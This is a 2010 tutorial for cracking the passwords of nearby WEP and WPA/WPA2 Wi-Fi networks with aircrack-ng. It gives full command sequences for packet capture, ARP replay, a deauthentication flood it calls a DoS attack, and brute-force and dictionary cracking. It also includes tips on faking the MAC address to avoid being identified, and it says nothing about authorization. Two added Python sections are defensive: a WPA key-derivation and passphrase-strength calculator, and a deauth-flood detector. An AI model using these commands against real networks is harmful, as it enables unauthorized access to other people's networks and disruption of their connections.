Hacking Encrypted Wireless Network
Written by Fredrik Alm CompuTechSweden | 2010 http://www.fredrik-alm.se/
REQUIREMENTS

Software:
  Operating System: Linux kernel (Recommended: BackTrack 4 Final, Download: Live CD, 1570 MB)
  3rd Party Software: aircrack-ng (pre-included in BackTrack), macchanger (pre-included in BackTrack)

Hardware:
  Computer: A working standard desktop/laptop PC (no hard drive needed).
  Devices: A Linux-compatible Wi-Fi device installed on your PC.
Word Explanation

AP          = Access Point (Wi-Fi station)             (ex. router / hack target)
##          = An optional number                       (ex: 30)
DEVICE      = The computer's Wi-Fi device card         (ex: wlan0)
BSSID       = The AP's MAC address                     (ex: F4:32:B6:4C:DE:4A)
CHANNEL     = The AP's active Wi-Fi channel            (ex: 6)
WORDLIST    = Path to a dictionary wordlist            (ex: home/passwords.txt)
FAKEMAC     = An optional faked MAC address            (ex: 00:11:22:33:44:66)
CAPTUREFILE = The file where captured data is stored   (ex: wepcapture-01.cap)

Useful Keyboard Shortcuts in Terminal

Ctrl + C     = Quits an active process in the terminal (ex: data capturing)
Up-arrow key = Cycles through the last used commands
Preparing: Wi-Fi Device

Background Information: Before attacking a wireless network, fake the MAC address of your Wi-Fi device so that other users cannot log your real ID.

Tip: When experienced, use a complex faked MAC address so you don't reveal yourself.
(Ex. 00:11:22:33:44:66 = Obvious to others, but easy for you to remember.)
(Ex. F4:32:B6:4C:DE:4A = Difficult to detect, but hard for you to remember.)

NOTE: All commands must be run as ROOT. If you are using a Live CD you are logged in as ROOT by default. If not, type sudo -s in every terminal before executing commands.

- Terminal 1
  # iwconfig
    Lists your compatible Wi-Fi devices. Use this command to see the name of your device. Device name examples: wlan0, wifi0, eth0
  # airmon-ng stop DEVICE
    Disables monitor mode on your Wi-Fi device.
  # macchanger --mac FAKEMAC DEVICE
    Changes the MAC address of your Wi-Fi device to an optional fake MAC.
  # airmon-ng start DEVICE
    Enables monitor mode on your Wi-Fi device.
Hacking: WEP Encryption

Background Information: Wired Equivalent Privacy (WEP) is an easily broken and therefore deprecated algorithm for securing wireless networks. This type of encryption can be brute-forced directly, without the need for a dictionary. When hacking, the attacker must capture a large amount of data, which is later brute-forced to reveal the network password.

Tip: The more data you capture, the higher the chance of a successful decryption. To be on the safe side, capture 200 000+ packets and 500+ ARPs.

NOTE: All commands must be run as ROOT. If you are using a Live CD you are logged in as ROOT by default. If not, type sudo -s in every terminal before executing the first command.

- Terminal 1
  # airodump-ng DEVICE
    Lists all APs nearby, revealing their MAC addresses, active channels, encryption (ex. WEP / WPA) etc.
- Terminal 2
  # airodump-ng -c CHANNEL -w CAPTUREFILE --bssid BSSID DEVICE
    Captures encrypted data/packets from the network and saves them on your computer.
- Terminal 3
  # aireplay-ng -3 -b BSSID -h FAKEMAC DEVICE
    Captures ARPs from the AP and speeds up the data capture.
- Terminal 1, 2 or 3
  # ls
    Displays all files and folders in the current directory (root). Look for the CAPTUREFILE (ex. wepcapture-01.cap).
  # aircrack-ng --bssid BSSID CAPTUREFILE
    Brute-forces the captured data to finally reveal the network password.
Hacking: WPA/2 Encryption

Background Information: Wi-Fi Protected Access (WPA) is a more secure and therefore harder-to-break algorithm for securing wireless networks. This type of encryption cannot be brute-forced directly. After collecting the so-called WPA handshake, only a dictionary attack (a wordlist of passwords) that contains the correct password can break the encryption and reveal the network password.

Tip: Capturing a WPA handshake depends entirely on computers that are authorized on the network: the handshake can only be captured at the moment a computer connects to the network. The De-Auth process in the following commands can help with this. Before hacking, download a big and good wordlist from the internet to use with the decryption.
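Why only a wordlist that already contains the exact passphrase works, and what that means for whoever runs the network: a WPA/WPA2-PSK client turns the passphrase into the 256-bit Pairwise Master Key with PBKDF2-HMAC-SHA1, 4096 iterations, using the SSID as salt (IEEE 802.11i). Every guess therefore costs 4096 HMAC rounds, and the SSID salt means a table built for one network name is useless against another. The script below is an added example, not part of the original tutorial or of the aircrack-ng suite; it derives the PMK exactly as a client does and works out the worst-case time to exhaust a passphrase space. The guess rate and the policy thresholds are assumptions chosen for illustration, and the function names are my own.

```python
import hashlib
import math

# Added example, not from the original tutorial. The derivation constants are
# the ones IEEE 802.11i specifies for WPA/WPA2-PSK; everything else (function
# names, the guess rate used below, the policy threshold) is an assumption.
PBKDF2_ITERATIONS = 4096   # PMK = PBKDF2(HMAC-SHA1, passphrase, ssid, 4096, 256 bits)
PMK_LENGTH_BYTES = 32
SECONDS_PER_YEAR = 365 * 24 * 3600


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """Return the 256-bit Pairwise Master Key a WPA/WPA2-PSK client derives.

    The SSID is the salt, so the same passphrase yields a different PMK on
    every network; a precomputed table only ever helps against one SSID.
    """
    return hashlib.pbkdf2_hmac(
        "sha1",
        passphrase.encode("utf-8"),
        ssid.encode("utf-8"),
        PBKDF2_ITERATIONS,
        PMK_LENGTH_BYTES,
    )


def keyspace_bits(alphabet_size: int, length: int) -> float:
    """Entropy in bits of a uniformly random passphrase of the given length."""
    return length * math.log2(alphabet_size)


def years_to_exhaust(alphabet_size: int, length: int, guesses_per_second: float) -> float:
    """Worst-case wall-clock years to try every passphrase at a fixed guess rate."""
    return (alphabet_size ** length) / guesses_per_second / SECONDS_PER_YEAR


def passphrase_is_wordlist_resistant(passphrase: str, min_length: int = 16) -> bool:
    """Assumed policy: long enough and not a single lower-case word or a digit string.

    Anything a wordlist could plausibly contain (short, all lower-case letters,
    or all digits) fails. The 16-character threshold is an assumption, not a standard.
    """
    if len(passphrase) < min_length:
        return False
    if passphrase.isdigit() or (passphrase.isalpha() and passphrase.islower()):
        return False
    return True


if __name__ == "__main__":
    # Published 802.11i test vector: passphrase "password", SSID "IEEE".
    print(derive_pmk("password", "IEEE").hex())
    # Same passphrase, different SSID: different PMK.
    print(derive_pmk("password", "IEEE") != derive_pmk("password", "IEEE-guest"))
    # Assumed guess rate of 100 000 PBKDF2 derivations per second.
    print(f"8 digits:          {years_to_exhaust(10, 8, 1e5):.2e} years")
    print(f"16 alphanumerics:  {years_to_exhaust(62, 16, 1e5):.2e} years")
```

The numbers make the defensive point: an 8-digit PIN-style passphrase is exhausted in minutes at that rate, while 16 random alphanumerics take longer than the age of the universe, so a wordlist of any size is only a threat to passphrases that are short or made of common words.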
NOTE: All commands must be run as ROOT. If you are using a Live CD you are logged in as ROOT by default. If not, type sudo -s in every terminal before executing the first command.

- Terminal 1
  # airodump-ng DEVICE
    Lists all APs nearby, revealing their MAC addresses, active channels, encryption (ex. WEP / WPA) etc.
- Terminal 2
  # airodump-ng -c CHANNEL -w CAPTUREFILE --bssid BSSID DEVICE
    Captures encrypted data/packets from the network and saves them on your computer.
- Terminal 3
  # aireplay-ng -0 ## -a BSSID DEVICE
    Sends out a De-Auth broadcast (DoS attack) that forces all computers on the wireless network to reconnect. If successful, this might help capture the WPA handshake.
- Terminal 1, 2 or 3
  # ls
    Displays all files and folders in the current directory (root). Look for the CAPTUREFILE (ex. wpacapture-01.cap).
  # aircrack-ng -w WORDLIST CAPTUREFILE
    Runs the dictionary against the captured handshake to finally reveal the network password.
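The De-Auth step above is also what a wireless IDS watches for: deauthentication frames are unauthenticated management frames in WPA/WPA2 without management frame protection, so a burst of them carrying one BSSID and aimed at the broadcast address is the signature of the forced reconnect. The detector below is an added example, not part of the original tutorial or of the aircrack-ng suite. It runs over constructed frame records (timestamp, subtype, BSSID, destination) rather than a real capture, and the threshold and window are assumed tuning values.

```python
from collections import deque

# Added example, not from the original tutorial. Frame records are constructed
# dicts; a real deployment would fill them from a monitor-mode capture.
# Threshold and window are assumed tuning values, not a standard.
BROADCAST = "ff:ff:ff:ff:ff:ff"
DEAUTH_THRESHOLD = 10    # this many deauth frames from one BSSID ...
WINDOW_SECONDS = 2.0     # ... inside this many seconds raises an alert

# Constructed addresses: AP_A behaves normally (beacons plus one legitimate
# deauth to a single client); AP_B's BSSID carries 30 broadcast deauths in a second.
AP_A = "02:00:00:00:00:01"
AP_B = "02:00:00:00:00:02"
CLIENT = "02:00:00:00:00:aa"


def constructed_frames():
    """Build the sample capture: normal traffic from AP_A, a flood using AP_B's BSSID."""
    frames = []
    for i in range(50):                                    # beacons every 100 ms
        frames.append({"t": i * 0.1, "subtype": "beacon", "bssid": AP_A, "dst": BROADCAST})
    frames.append({"t": 1.3, "subtype": "deauth", "bssid": AP_A, "dst": CLIENT})
    for i in range(30):                                    # the flood
        frames.append({"t": 2.0 + i * 0.03, "subtype": "deauth", "bssid": AP_B, "dst": BROADCAST})
    return sorted(frames, key=lambda f: f["t"])


def detect_deauth_floods(frames, threshold=DEAUTH_THRESHOLD, window=WINDOW_SECONDS):
    """Sliding-window count of deauth frames per BSSID; one alert per offending BSSID.

    frames must be ordered by time. Each alert records how many deauth frames
    were inside the window when it fired and how many of those were broadcast,
    since a legitimate AP deauthenticates single clients, not everyone at once.
    """
    recent = {}          # bssid -> deque of (timestamp, dst) for deauths in the window
    alerted = set()
    alerts = []
    for f in frames:
        if f["subtype"] != "deauth":
            continue
        q = recent.setdefault(f["bssid"], deque())
        q.append((f["t"], f["dst"]))
        while q and f["t"] - q[0][0] > window:
            q.popleft()
        if len(q) >= threshold and f["bssid"] not in alerted:
            alerted.add(f["bssid"])
            alerts.append({
                "bssid": f["bssid"],
                "t": round(f["t"], 3),
                "count": len(q),
                "broadcast_frames": sum(1 for _, dst in q if dst == BROADCAST),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_deauth_floods(constructed_frames()):
        print(alert)
```

The single legitimate deauth from AP_A never reaches the threshold, while the flood on AP_B's BSSID fires once, at the tenth frame, and is reported as all-broadcast; in practice the same logic is applied per BSSID and per destination so that a burst aimed at one client is caught as well.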